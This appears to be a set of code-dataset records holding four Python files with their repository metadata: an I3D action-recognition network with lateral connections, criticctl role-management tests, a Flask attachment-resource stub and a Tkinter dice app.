# kernel_shape=[1, 1, 1],
# activation_fn=None,
# use_batch_norm=False,
# use_bias=True,
# name='Conv3d_0c_1x1')(net, is_training=is_training)
# if self._spatial_squeeze:
# logits = tf.squeeze(logits, [2, 3], name='SpatialSqueeze')
# averaged_logits = tf.reduce_mean(logits, axis=1)
# end_points[end_point] = averaged_logits
############################ Lateral Connections for temporal context
def lateralconnection(inputs, t_span, output_channels, kernel_shape, stride, is_training, name):
B, T, H, W, C = inputs.shape
subsampling_step = T // t_span
sub_in = inputs[:,::subsampling_step]
#temporal_context = Unit3D(output_channels, kernel_shape, stride, name)(sub_in, is_training=is_training)
with tf.variable_scope(name):
temporal_context = snt.Conv3D(output_channels=output_channels,
kernel_shape=kernel_shape,
stride=stride,
padding=snt.SAME,
use_bias=True)(sub_in)
#temporal_context = tf.layers.conv3d(sub_in, filters=output_channels, kernel_size=kernel_shape, strides=stride, padding='SAME', activation=tf.nn.relu, name=name)
pooled_context = tf.nn.max_pool3d(temporal_context, ksize=[1, t_span, 1, 1, 1], strides=[1, t_span, 1, 1, 1], padding='VALID', name=name+'pooling')
return pooled_context
class LateralInceptionI3d(snt.AbstractModule):
"""Inception-v1 I3D architecture.
The model is introduced in:
Quo Vadis, Action Recognition? A New Model and the Kinetics Dataset
Joao Carreira, Andrew Zisserman
https://arxiv.org/pdf/1705.07750v1.pdf.
See also the Inception architecture, introduced in:
Going deeper with convolutions
Christian Szegedy, Wei Liu, Yangqing Jia, Pierre Sermanet, Scott Reed,
Dragomir Anguelov, Dumitru Erhan, Vincent Vanhoucke, Andrew Rabinovich.
http://arxiv.org/pdf/1409.4842v1.pdf.
"""
# Endpoints of the model in order. During construction, all the endpoints up
# to a designated `final_endpoint` are returned in a dictionary as the
# second return value.
VALID_ENDPOINTS = (
'Conv3d_1a_7x7',
'MaxPool3d_2a_3x3',
'Conv3d_2b_1x1',
'Conv3d_2c_3x3',
'MaxPool3d_3a_3x3',
'Mixed_3b',
'Mixed_3c',
'MaxPool3d_4a_3x3',
'Mixed_4b',
'Mixed_4c',
'Mixed_4d',
'Mixed_4e',
'Mixed_4f',
'MaxPool3d_5a_2x2',
'Mixed_5b',
'Mixed_5c',
'Logits',
'Predictions',
)
def __init__(self, num_classes=400, spatial_squeeze=True,
final_endpoint='Logits', name='inception_i3d'):
"""Initializes I3D model instance.
Args:
num_classes: The number of outputs in the logit layer (default 400, which
matches the Kinetics dataset).
spatial_squeeze: Whether to squeeze the spatial dimensions for the logits
before returning (default True).
final_endpoint: The model contains many possible endpoints.
`final_endpoint` specifies the last endpoint for the model to be built
up to. In addition to the output at `final_endpoint`, all the outputs
at endpoints up to `final_endpoint` will also be returned, in a
dictionary. `final_endpoint` must be one of
InceptionI3d.VALID_ENDPOINTS (default 'Logits').
name: A string (optional). The name of this module.
Raises:
ValueError: if `final_endpoint` is not recognized.
"""
if final_endpoint not in self.VALID_ENDPOINTS:
raise ValueError('Unknown final endpoint %s' % final_endpoint)
super(LateralInceptionI3d, self).__init__(name=name)
self._num_classes = num_classes
self._spatial_squeeze = spatial_squeeze
self._final_endpoint = final_endpoint
def _build(self, inputs, is_training, dropout_keep_prob=1.0, channel_mult=1.0):
"""Connects the model to inputs.
Args:
inputs: Inputs to the model, which should have dimensions
`batch_size` x `num_frames` x 224 x 224 x `num_channels`.
is_training: whether to use training mode for snt.BatchNorm (boolean).
dropout_keep_prob: Probability for the tf.nn.dropout layer (float in
[0, 1)).
Returns:
A tuple consisting of:
1. Network output at location `self._final_endpoint`.
2. Dictionary containing all endpoints up to `self._final_endpoint`,
indexed by endpoint name.
Raises:
ValueError: if `self._final_endpoint` is not recognized.
"""
if self._final_endpoint not in self.VALID_ENDPOINTS:
raise ValueError('Unknown final endpoint %s' % self._final_endpoint)
net = inputs
end_points = {}
end_point = 'Conv3d_1a_7x7'
prev = net ###
net = Unit3D(output_channels=channel_mult*64, kernel_shape=[7, 7, 7],
stride=[2, 2, 2], name=end_point)(net, is_training=is_training)
lat = lateralconnection(prev, 4, 64, [1,7,7], [1,2,2], is_training, 'lateral1') ###
net = net + lat ###
end_points[end_point] = net
if self._final_endpoint == end_point: return net, end_points
end_point = 'MaxPool3d_2a_3x3'
net = tf.nn.max_pool3d(net, ksize=[1, 1, 3, 3, 1], strides=[1, 1, 2, 2, 1],
padding=snt.SAME, name=end_point)
end_points[end_point] = net
if self._final_endpoint == end_point: return net, end_points
end_point = 'Conv3d_2b_1x1'
prev = net ###
net = Unit3D(output_channels=channel_mult*64, kernel_shape=[1, 1, 1],
name=end_point)(net, is_training=is_training)
lat = lateralconnection(prev, 4, 64, [1,1,1], [1,1,1], is_training, 'lateral2') ###
net = net + lat ###
end_points[end_point] = net
if self._final_endpoint == end_point: return net, end_points
end_point = 'Conv3d_2c_3x3'
prev = net ###
net = Unit3D(output_channels=channel_mult*192, kernel_shape=[3, 3, 3],
name=end_point)(net, is_training=is_training)
lat = lateralconnection(prev, 4, 192, [3,3,3], [1,1,1], is_training, 'lateral3') ###
net = net + lat ###
end_points[end_point] = net
if self._final_endpoint == end_point: return net, end_points
end_point = 'MaxPool3d_3a_3x3'
net = tf.nn.max_pool3d(net, ksize=[1, 1, 3, 3, 1], strides=[1, 1, 2, 2, 1],
padding=snt.SAME, name=end_point)
end_points[end_point] = net
if self._final_endpoint == end_point: return net, end_points
end_point = 'Mixed_3b'
with tf.variable_scope(end_point):
with tf.variable_scope('Branch_0'):
branch_0 = Unit3D(output_channels=channel_mult*64, kernel_shape=[1, 1, 1],
name='Conv3d_0a_1x1')(net, is_training=is_training)
with tf.variable_scope('Branch_1'):
branch_1 = Unit3D(output_channels=channel_mult*96, kernel_shape=[1, 1, 1],
name='Conv3d_0a_1x1')(net, is_training=is_training)
branch_1 = Unit3D(output_channels=channel_mult*128, kernel_shape=[3, 3, 3],
name='Conv3d_0b_3x3')(branch_1,
is_training=is_training)
with tf.variable_scope('Branch_2'):
branch_2 = Unit3D(output_channels=channel_mult*16, kernel_shape=[1, 1, 1],
name='Conv3d_0a_1x1')(net, is_training=is_training)
branch_2 = Unit3D(output_channels=channel_mult*32, kernel_shape=[3, 3, 3],
name='Conv3d_0b_3x3')(branch_2,
is_training=is_training)
with tf.variable_scope('Branch_3'):
branch_3 = tf.nn.max_pool3d(net, ksize=[1, 3, 3, 3, 1],
strides=[1, 1, 1, 1, 1], padding=snt.SAME,
name='MaxPool3d_0a_3x3')
branch_3 = Unit3D(output_channels=channel_mult*32, kernel_shape=[1, 1, 1],
name='Conv3d_0b_1x1')(branch_3,
is_training=is_training)
net = tf.concat([branch_0, branch_1, branch_2, branch_3], 4)
end_points[end_point] = net
if self._final_endpoint == end_point: return net, end_points
end_point = 'Mixed_3c'
with tf.variable_scope(end_point):
with tf.variable_scope('Branch_0'):
branch_0 = Unit3D(output_channels=channel_mult*128, kernel_shape=[1, 1, 1],
name='Conv3d_0a_1x1')(net, is_training=is_training)
with tf.variable_scope('Branch_1'):
branch_1 = Unit3D(output_channels=channel_mult*128, kernel_shape=[1, 1, 1],
name='Conv3d_0a_1x1')(net, is_training=is_training)
branch_1 = Unit3D(output_channels=channel_mult*192, kernel_shape=[3, 3, 3],
name='Conv3d_0b_3x3')(branch_1,
is_training=is_training)
with tf.variable_scope('Branch_2'):
branch_2 = Unit3D(output_channels=channel_mult*32, kernel_shape=[1, 1, 1],
name='Conv3d_0a_1x1')(net, is_training=is_training)
branch_2 = Unit3D(output_channels=channel_mult*96, kernel_shape=[3, 3, 3],
name='Conv3d_0b_3x3')(branch_2,
is_training=is_training)
with tf.variable_scope('Branch_3'):
branch_3 = tf.nn.max_pool3d(net, ksize=[1, 3, 3, 3, 1],
strides=[1, 1, 1, 1, 1], padding=snt.SAME,
name='MaxPool3d_0a_3x3')
branch_3 = Unit3D(output_channels=channel_mult*64, kernel_shape=[1, 1, 1],
name='Conv3d_0b_1x1')(branch_3,
is_training=is_training)
net = tf.concat([branch_0, branch_1, branch_2, branch_3], 4)
end_points[end_point] = net
if self._final_endpoint == end_point: return net, end_points
end_point = 'MaxPool3d_4a_3x3'
net = tf.nn.max_pool3d(net, ksize=[1, 3, 3, 3, 1], strides=[1, 2, 2, 2, 1],
padding=snt.SAME, name=end_point)
end_points[end_point] = net
if self._final_endpoint == end_point: return net, end_points
end_point = 'Mixed_4b'
with tf.variable_scope(end_point):
with tf.variable_scope('Branch_0'):
branch_0 = Unit3D(output_channels=channel_mult*192, kernel_shape=[1, 1, 1],
name='Conv3d_0a_1x1')(net, is_training=is_training)
with tf.variable_scope('Branch_1'):
branch_1 = Unit3D(output_channels=channel_mult*96, kernel_shape=[1, 1, 1],
name='Conv3d_0a_1x1')(net, is_training=is_training)
branch_1 = Unit3D(output_channels=channel_mult*208, kernel_shape=[3, 3, 3],
name='Conv3d_0b_3x3')(branch_1,
is_training=is_training)
with tf.variable_scope('Branch_2'):
branch_2 = Unit3D(output_channels=channel_mult*16, kernel_shape=[1, 1, 1],
name='Conv3d_0a_1x1')(net, is_training=is_training)
branch_2 = Unit3D(output_channels=channel_mult*48, kernel_shape=[3, 3, 3],
name='Conv3d_0b_3x3')(branch_2,
is_training=is_training)
with tf.variable_scope('Branch_3'):
branch_3 = tf.nn.max_pool3d(net, ksize=[1, 3, 3, 3, 1],
strides=[1, 1, 1, 1, 1], padding=snt.SAME,
name='MaxPool3d_0a_3x3')
branch_3 = Unit3D(output_channels=channel_mult*64, kernel_shape=[1, 1, 1],
name='Conv3d_0b_1x1')(branch_3,
is_training=is_training)
net = tf.concat([branch_0, branch_1, branch_2, branch_3], 4)
end_points[end_point] = net
if self._final_endpoint == end_point: return net, end_points
end_point = 'Mixed_4c'
with tf.variable_scope(end_point):
with tf.variable_scope('Branch_0'):
branch_0 = Unit3D(output_channels=channel_mult*160, kernel_shape=[1, 1, 1],
name='Conv3d_0a_1x1')(net, is_training=is_training)
with tf.variable_scope('Branch_1'):
branch_1 = Unit3D(output_channels=channel_mult*112, kernel_shape=[1, 1, 1],
name='Conv3d_0a_1x1')(net, is_training=is_training)
branch_1 = Unit3D(output_channels=channel_mult*224, kernel_shape=[3, 3, 3],
name='Conv3d_0b_3x3')(branch_1,
is_training=is_training)
with tf.variable_scope('Branch_2'):
branch_2 = Unit3D(output_channels=channel_mult*24, kernel_shape=[1, 1, 1],
name='Conv3d_0a_1x1')(net, is_training=is_training)
branch_2 = Unit3D(output_channels=channel_mult*64, kernel_shape=[3, 3, 3],
name='Conv3d_0b_3x3')(branch_2,
is_training=is_training)
with tf.variable_scope('Branch_3'):
branch_3 = tf.nn.max_pool3d(net, ksize=[1, 3, 3, 3, 1],
strides=[1, 1, 1, 1, 1], padding=snt.SAME,
name='MaxPool3d_0a_3x3')
branch_3 = Unit3D(output_channels=channel_mult*64, kernel_shape=[1, 1, 1],
name='Conv3d_0b_1x1')(branch_3,
is_training=is_training)
net = tf.concat([branch_0, branch_1, branch_2, branch_3], 4)
end_points[end_point] = net
if self._final_endpoint == end_point: return net, end_points
end_point = 'Mixed_4d'
with tf.variable_scope(end_point):
with tf.variable_scope('Branch_0'):
branch_0 = Unit3D(output_channels=channel_mult*128, kernel_shape=[1, 1, 1],
name='Conv3d_0a_1x1')(net, is_training=is_training)
with tf.variable_scope('Branch_1'):
branch_1 = Unit3D(output_channels=channel_mult*128, kernel_shape=[1, 1, 1],
name='Conv3d_0a_1x1')(net, is_training=is_training)
branch_1 = Unit3D(output_channels=channel_mult*256, kernel_shape=[3, 3, 3],
name='Conv3d_0b_3x3')(branch_1,
is_training=is_training)
with tf.variable_scope('Branch_2'):
branch_2 = Unit3D(output_channels=channel_mult*24, kernel_shape=[1, 1, 1],
name='Conv3d_0a_1x1')(net, is_training=is_training)
branch_2 = Unit3D(output_channels=channel_mult*64, kernel_shape=[3, 3, 3],
name='Conv3d_0b_3x3')(branch_2,
is_training=is_training)
with tf.variable_scope('Branch_3'):
branch_3 = tf.nn.max_pool3d(net, ksize=[1, 3, 3, 3, 1],
strides=[1, 1, 1, 1, 1], padding=snt.SAME,
name='MaxPool3d_0a_3x3')
branch_3 = Unit3D(output_channels=channel_mult*64, kernel_shape=[1, 1, 1],
name='Conv3d_0b_1x1')(branch_3,
is_training=is_training)
net = tf.concat([branch_0, branch_1, branch_2, branch_3], 4)
end_points[end_point] = net
if self._final_endpoint == end_point: return net, end_points
end_point = 'Mixed_4e'
with tf.variable_scope(end_point):
with tf.variable_scope('Branch_0'):
branch_0 = Unit3D(output_channels=channel_mult*112, kernel_shape=[1, 1, 1],
name='Conv3d_0a_1x1')(net, is_training=is_training)
with tf.variable_scope('Branch_1'):
branch_1 = Unit3D(output_channels=channel_mult*144, kernel_shape=[1, 1, 1],
name='Conv3d_0a_1x1')(net, is_training=is_training)
branch_1 = Unit3D(output_channels=channel_mult*288, kernel_shape=[3, 3, 3],
name='Conv3d_0b_3x3')(branch_1,
is_training=is_training)
with tf.variable_scope('Branch_2'):
branch_2 = Unit3D(output_channels=channel_mult*32, kernel_shape=[1, 1, 1],
name='Conv3d_0a_1x1')(net, is_training=is_training)
branch_2 = Unit3D(output_channels=channel_mult*64, kernel_shape=[3, 3, 3],
name='Conv3d_0b_3x3')(branch_2,
is_training=is_training)
with tf.variable_scope('Branch_3'):
branch_3 = tf.nn.max_pool3d(net, ksize=[1, 3, 3, 3, 1],
strides=[1, 1, 1, 1, 1], padding=snt.SAME,
name='MaxPool3d_0a_3x3')
branch_3 = Unit3D(output_channels=channel_mult*64, kernel_shape=[1, 1, 1],
name='Conv3d_0b_1x1')(branch_3,
is_training=is_training)
net = tf.concat([branch_0, branch_1, branch_2, branch_3], 4)
end_points[end_point] = net
if self._final_endpoint == end_point: return net, end_points
end_point = 'Mixed_4f'
with tf.variable_scope(end_point):
with tf.variable_scope('Branch_0'):
branch_0 = Unit3D(output_channels=channel_mult*256, kernel_shape=[1, 1, 1],
name='Conv3d_0a_1x1')(net, is_training=is_training)
with tf.variable_scope('Branch_1'):
branch_1 = Unit3D(output_channels=channel_mult*160, kernel_shape=[1, 1, 1],
name='Conv3d_0a_1x1')(net, is_training=is_training)
branch_1 = Unit3D(output_channels=channel_mult*320, kernel_shape=[3, 3, 3],
name='Conv3d_0b_3x3')(branch_1,
is_training=is_training)
with tf.variable_scope('Branch_2'):
branch_2 = Unit3D(output_channels=channel_mult*32, kernel_shape=[1, 1, 1],
name='Conv3d_0a_1x1')(net, is_training=is_training)
branch_2 = Unit3D(output_channels=channel_mult*128, kernel_shape=[3, 3, 3],
name='Conv3d_0b_3x3')(branch_2,
is_training=is_training)
with tf.variable_scope('Branch_3'):
branch_3 = tf.nn.max_pool3d(net, ksize=[1, 3, 3, 3, 1],
strides=[1, 1, 1, 1, 1], padding=snt.SAME,
name='MaxPool3d_0a_3x3')
branch_3 = Unit3D(output_channels=channel_mult*128, kernel_shape=[1, 1, 1],
name='Conv3d_0b_1x1')(branch_3,
is_training=is_training)
net = tf.concat([branch_0, branch_1, branch_2, branch_3], 4)
end_points[end_point] = net
if self._final_endpoint == end_point: return net, end_points
end_point = 'MaxPool3d_5a_2x2'
net = tf.nn.max_pool3d(net, ksize=[1, 2, 2, 2, 1], strides=[1, 2, 2, 2, 1],
padding=snt.SAME, name=end_point)
end_points[end_point] = net
if self._final_endpoint == end_point: return net, end_points
end_point = 'Mixed_5b'
with tf.variable_scope(end_point):
with tf.variable_scope('Branch_0'):
branch_0 = Unit3D(output_channels=channel_mult*256, kernel_shape=[1, 1, 1],
name='Conv3d_0a_1x1')(net, is_training=is_training)
with tf.variable_scope('Branch_1'):
branch_1 = Unit3D(output_channels=channel_mult*160, kernel_shape=[1, 1, 1],
name='Conv3d_0a_1x1')(net, is_training=is_training)
branch_1 = Unit3D(output_channels=channel_mult*320, kernel_shape=[3, 3, 3],
name='Conv3d_0b_3x3')(branch_1,
is_training=is_training)
with tf.variable_scope('Branch_2'):
branch_2 = Unit3D(output_channels=channel_mult*32, kernel_shape=[1, 1, 1],
name='Conv3d_0a_1x1')(net, is_training=is_training)
branch_2 = Unit3D(output_channels=channel_mult*128, kernel_shape=[3, 3, 3],
name='Conv3d_0a_3x3')(branch_2,
is_training=is_training)
with tf.variable_scope('Branch_3'):
branch_3 = tf.nn.max_pool3d(net, ksize=[1, 3, 3, 3, 1],
strides=[1, 1, 1, 1, 1], padding=snt.SAME,
name='MaxPool3d_0a_3x3')
branch_3 = Unit3D(output_channels=channel_mult*128, kernel_shape=[1, 1, 1],
name='Conv3d_0b_1x1')(branch_3,
is_training=is_training)
net = tf.concat([branch_0, branch_1, branch_2, branch_3], 4)
end_points[end_point] = net
if self._final_endpoint == end_point: return net, end_points
end_point = 'Mixed_5c'
with tf.variable_scope(end_point):
with tf.variable_scope('Branch_0'):
branch_0 = Unit3D(output_channels=channel_mult*384, kernel_shape=[1, 1, 1],
name='Conv3d_0a_1x1')(net, is_training=is_training)
with tf.variable_scope('Branch_1'):
branch_1 = Unit3D(output_channels=channel_mult*192, kernel_shape=[1, 1, 1],
name='Conv3d_0a_1x1')(net, is_training=is_training)
branch_1 = Unit3D(output_channels=channel_mult*384, kernel_shape=[3, 3, 3],
name='Conv3d_0b_3x3')(branch_1,
is_training=is_training)
with tf.variable_scope('Branch_2'):
branch_2 = Unit3D(output_channels=channel_mult*48, kernel_shape=[1, 1, 1],
name='Conv3d_0a_1x1')(net, is_training=is_training)
branch_2 = Unit3D(output_channels=channel_mult*128, kernel_shape=[3, 3, 3],
name='Conv3d_0b_3x3')(branch_2,
is_training=is_training)
with tf.variable_scope('Branch_3'):
branch_3 = tf.nn.max_pool3d(net, ksize=[1, 3, 3, 3, 1],
strides=[1, 1, 1, 1, 1], padding=snt.SAME,
name='MaxPool3d_0a_3x3')
branch_3 = Unit3D(output_channels=channel_mult*128, kernel_shape=[1, 1, 1],
name='Conv3d_0b_1x1')(branch_3,
is_training=is_training)
net = tf.concat([branch_0, branch_1, branch_2, branch_3], 4)
end_points[end_point] = net
if self._final_endpoint == end_point: return net, end_points
end_point = 'Logits'
with tf.variable_scope(end_point):
net = tf.nn.avg_pool3d(net, ksize=[1, 2, 7, 7, 1],
strides=[1, 1, 1, 1, 1], padding=snt.VALID)
net = tf.nn.dropout(net, dropout_keep_prob)
logits = Unit3D(output_channels=self._num_classes,
kernel_shape=[1, 1, 1],
activation_fn=None,
use_batch_norm=False,
use_bias=True,
name='Conv3d_0c_1x1')(net, is_training=is_training)
if self._spatial_squeeze:
logits = tf.squeeze(logits, [2, 3], name='SpatialSqueeze')
averaged_logits = tf.reduce_mean(logits, axis=1)
end_points[end_point] = averaged_logits
if self._final_endpoint == end_point: return averaged_logits, end_points
end_point = 'Predictions'
predictions = tf.nn.softmax(averaged_logits)
end_points[end_point] = predictions
return predictions, end_points
| 51.399471
| 165
| 0.596308
| 7,663
| 58,287
| 4.224586
| 0.05246
| 0.018658
| 0.015939
| 0.085256
| 0.904056
| 0.896673
| 0.889198
| 0.886819
| 0.881074
| 0.874958
| 0
| 0.064191
| 0.292793
| 58,287
| 1,133
| 166
| 51.444837
| 0.721162
| 0.153568
| 0
| 0.882283
| 0
| 0
| 0.078764
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.016647
| false
| 0
| 0.005945
| 0.001189
| 0.03805
| 0.005945
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
dba86bdd5c08ab6627ec36aeb7efaeccdb4f421d
| 4,019
|
py
|
Python
|
testing/tests/001-main/001-empty/003-criticctl/002-addrole-delrole.py
|
darobin/critic
|
9d09f3ae45d0b37fb899c5323409c06e8622a2a1
|
[
"Apache-2.0",
"MIT"
] | 1
|
2020-12-04T18:43:10.000Z
|
2020-12-04T18:43:10.000Z
|
testing/tests/001-main/001-empty/003-criticctl/002-addrole-delrole.py
|
darobin/critic
|
9d09f3ae45d0b37fb899c5323409c06e8622a2a1
|
[
"Apache-2.0",
"MIT"
] | null | null | null |
testing/tests/001-main/001-empty/003-criticctl/002-addrole-delrole.py
|
darobin/critic
|
9d09f3ae45d0b37fb899c5323409c06e8622a2a1
|
[
"Apache-2.0",
"MIT"
] | null | null | null |
ROLES = ["administrator", "developer", "newswriter", "repositories"]
# Scenario: Try to add a role that 'admin' already has.
try:
output = instance.execute(
["sudo", "criticctl", "addrole",
"--name", "admin",
"--role", "administrator"])
expected_output = "admin: user already has role 'administrator'"
if expected_output not in output.splitlines():
logger.error("Expected output not found: %r\n%s"
% (expected_output, output))
except testing.virtualbox.GuestCommandError as error:
logger.error("correct criticctl usage failed:\n%s"
% error.stdout)
# Scenario: Try to delete a role 'alice' doesn't have.
try:
output = instance.execute(
["sudo", "criticctl", "delrole",
"--name", "alice",
"--role", "administrator"])
expected_output = "alice: user doesn't have role 'administrator'"
if expected_output not in output.splitlines():
logger.error("Expected output not found: %r\n%s"
% (expected_output, output))
except testing.virtualbox.GuestCommandError as error:
logger.error("correct criticctl usage failed:\n%s"
% error.stdout)
# Scenario: Try to add a role to a non-existing user.
try:
instance.execute(
["sudo", "criticctl", "addrole",
"--name", "nosuchuser",
"--role", "administrator"])
except testing.virtualbox.GuestCommandError as error:
if "nosuchuser: no such user" not in error.stdout.splitlines():
logger.error("criticctl failed with unexpected error message:\n%s"
% error.stdout)
else:
logger.error("incorrect criticctl usage did not fail: "
"addrole, non-existing user")
# Scenario: Try to delete a role from a non-existing user.
try:
instance.execute(
["sudo", "criticctl", "delrole",
"--name", "nosuchuser",
"--role", "administrator"])
except testing.virtualbox.GuestCommandError as error:
if "nosuchuser: no such user" not in error.stdout.splitlines():
logger.error("criticctl failed with unexpected error message:\n%s"
% error.stdout)
else:
logger.error("incorrect criticctl usage did not fail: "
"delrole, non-existing user")
# Scenario: Try to add an invalid role.
try:
instance.execute(
["sudo", "criticctl", "addrole",
"--name", "alice",
"--role", "joker"])
except testing.virtualbox.GuestCommandError as error:
if "invalid choice: 'joker'" not in error.stderr:
logger.error("criticctl failed with unexpected error message:\n%s"
% error.stderr)
else:
logger.error("incorrect criticctl usage did not fail: "
"addrole, invalid role")
# Scenario: Try to delete an invalid role.
try:
instance.execute(
["sudo", "criticctl", "delrole",
"--name", "alice",
"--role", "joker"])
except testing.virtualbox.GuestCommandError as error:
if "invalid choice: 'joker'" not in error.stderr:
logger.error("criticctl failed with unexpected error message:\n%s"
% error.stderr)
else:
logger.error("incorrect criticctl usage did not fail: "
"delrole, invalid role")
# Scenario: Add and then delete each role.
def test_role(role):
try:
instance.execute(
["sudo", "criticctl", "addrole",
"--name", "alice",
"--role", role])
except testing.virtualbox.GuestCommandError as error:
logger.error("correct criticctl usage failed:\n%s"
% error.stdout)
else:
try:
instance.execute(
["sudo", "criticctl", "delrole",
"--name", "alice",
"--role", role])
except testing.virtualbox.GuestCommandError as error:
logger.error("correct criticctl usage failed:\n%s"
% error.stdout)
for role in ROLES:
test_role(role)
| 37.212963
| 74
| 0.602886
| 439
| 4,019
| 5.501139
| 0.166287
| 0.063768
| 0.06294
| 0.092754
| 0.874534
| 0.872878
| 0.804969
| 0.799172
| 0.770186
| 0.699793
| 0
| 0
| 0.270216
| 4,019
| 107
| 75
| 37.560748
| 0.823389
| 0.083354
| 0
| 0.88172
| 0
| 0
| 0.342492
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.010753
| false
| 0
| 0
| 0
| 0.010753
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
dbcce3e1aaeaa66bf32401b3f405e836f16e51ac
| 1,063
|
py
|
Python
|
web/rest_api/resources/attachment.py
|
shawnyang610/project-onesteward
|
4165379adb9caa7253070251dda85fe96e527642
|
[
"MIT"
] | null | null | null |
web/rest_api/resources/attachment.py
|
shawnyang610/project-onesteward
|
4165379adb9caa7253070251dda85fe96e527642
|
[
"MIT"
] | null | null | null |
web/rest_api/resources/attachment.py
|
shawnyang610/project-onesteward
|
4165379adb9caa7253070251dda85fe96e527642
|
[
"MIT"
] | null | null | null |
from flask_restful import Resource, reqparse # noqa
from rest_api.models.attachment import AttachmentModel # noqa
from flask_jwt_extended import jwt_required
# TODO
##############################################
#### Create Attachment ####################
##############################################
class TrackingCreate(Resource):
@jwt_required
def post(self):
pass
##############################################
#### retrieve attachment ####################
##############################################
class TrackingInfo(Resource):
@jwt_required
def post(self):
pass
##############################################
#### update attachment ####################
##############################################
class TrackingUpdate(Resource):
@jwt_required
def put(self):
pass
##############################################
#### delete attachment ####################
##############################################
class TrackingDelete(Resource):
@jwt_required
def delete(self):
pass
| 23.108696
| 61
| 0.396049
| 67
| 1,063
| 6.149254
| 0.447761
| 0.133495
| 0.184466
| 0.213592
| 0.165049
| 0.165049
| 0.165049
| 0
| 0
| 0
| 0
| 0
| 0.135466
| 1,063
| 46
| 62
| 23.108696
| 0.448313
| 0.085607
| 0
| 0.526316
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.021739
| 0
| 1
| 0.210526
| false
| 0.210526
| 0.157895
| 0
| 0.578947
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 1
| 0
|
0
| 7
|
dbd36d5cb5030fe5990b642d41393591240d995e
| 2,337
|
py
|
Python
|
Dados Tkinter.py
|
LucasFerSa/Dado-GUI-Python
|
2b0b9d7aac66db9f8c6d40c3bfc23536f20e5975
|
[
"MIT"
] | null | null | null |
Dados Tkinter.py
|
LucasFerSa/Dado-GUI-Python
|
2b0b9d7aac66db9f8c6d40c3bfc23536f20e5975
|
[
"MIT"
] | null | null | null |
Dados Tkinter.py
|
LucasFerSa/Dado-GUI-Python
|
2b0b9d7aac66db9f8c6d40c3bfc23536f20e5975
|
[
"MIT"
] | null | null | null |
from tkinter import *
from random import randint
import time
app = Tk()
app.title = 'Sorteando números'
app.geometry("700x700+350+15")
app.configure(bg = '#1E054D')
def go():
background = Canvas(app, bg='white', heigh=500, width=500).place(x=100, y=20)
num = randint(1, 6)
time.sleep(0.5)
if num == 1:
circle = Canvas(app, bg= 'black', heigh = 70, width = 70).place(x=310, y=230)
if num == 2:
circle = Canvas(app, bg='black', heigh=70, width=70).place(x=120, y=40)
circle = Canvas(app, bg='black', heigh=70, width=70).place(x=500, y=430)
if num == 3:
circle = Canvas(app, bg='black', heigh=70, width=70).place(x=120, y=40)
circle = Canvas(app, bg='black', heigh=70, width=70).place(x=500, y=430)
circle = Canvas(app, bg='black', heigh=70, width=70).place(x=310, y=230)
if num == 4:
circle = Canvas(app, bg='black', heigh=70, width=70).place(x=120, y=40)
circle = Canvas(app, bg='black', heigh=70, width=70).place(x=500, y=430)
circle = Canvas(app, bg='black', heigh=70, width=70).place(x=500, y=40)
circle = Canvas(app, bg='black', heigh=70, width=70).place(x=120, y=430)
if num == 5:
circle = Canvas(app, bg='black', heigh=70, width=70).place(x=120, y=40)
circle = Canvas(app, bg='black', heigh=70, width=70).place(x=500, y=430)
circle = Canvas(app, bg='black', heigh=70, width=70).place(x=500, y=40)
circle = Canvas(app, bg='black', heigh=70, width=70).place(x=120, y=430)
circle = Canvas(app, bg='black', heigh=70, width=70).place(x=310, y=230)
if num == 6:
circle = Canvas(app, bg='black', heigh=70, width=70).place(x=120, y=40)
circle = Canvas(app, bg='black', heigh=70, width=70).place(x=500, y=430)
circle = Canvas(app, bg='black', heigh=70, width=70).place(x=500, y=40)
circle = Canvas(app, bg='black', heigh=70, width=70).place(x=120, y=430)
circle = Canvas(app, bg='black', heigh=70, width=70).place(x=120, y=230)
circle = Canvas(app, bg='black', heigh=70, width=70).place(x=500, y=230)
background = Canvas(app, bg = 'white', heigh = 500, width = 500).place(x=100, y=20)
Sortear = Button(app, bg = '#450B45', text= 'Sort', width = 12, heigh = 3, fg = 'white', font=90, command= go).place(x=285, y = 580)
app.mainloop()
| 50.804348
| 132
| 0.601626
| 398
| 2,337
| 3.532663
| 0.155779
| 0.085349
| 0.179943
| 0.253912
| 0.809388
| 0.809388
| 0.809388
| 0.809388
| 0.809388
| 0.809388
| 0
| 0.140883
| 0.195122
| 2,337
| 46
| 133
| 50.804348
| 0.606592
| 0
| 0
| 0.512195
| 0
| 0
| 0.072284
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.02439
| false
| 0
| 0.073171
| 0
| 0.097561
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
91681fcab88aff47044e4d6eeb0bf671245a148c
| 102
|
py
|
Python
|
tests/helper.py
|
peacemaker07/jawsug_sonic_midnight_jaws
|
59aa5b9c3222c76e76e49093555d9f628f9ec225
|
[
"MIT"
] | 1
|
2020-10-03T01:23:39.000Z
|
2020-10-03T01:23:39.000Z
|
tests/helper.py
|
peacemaker07/jawsug_sonic_midnight_jaws
|
59aa5b9c3222c76e76e49093555d9f628f9ec225
|
[
"MIT"
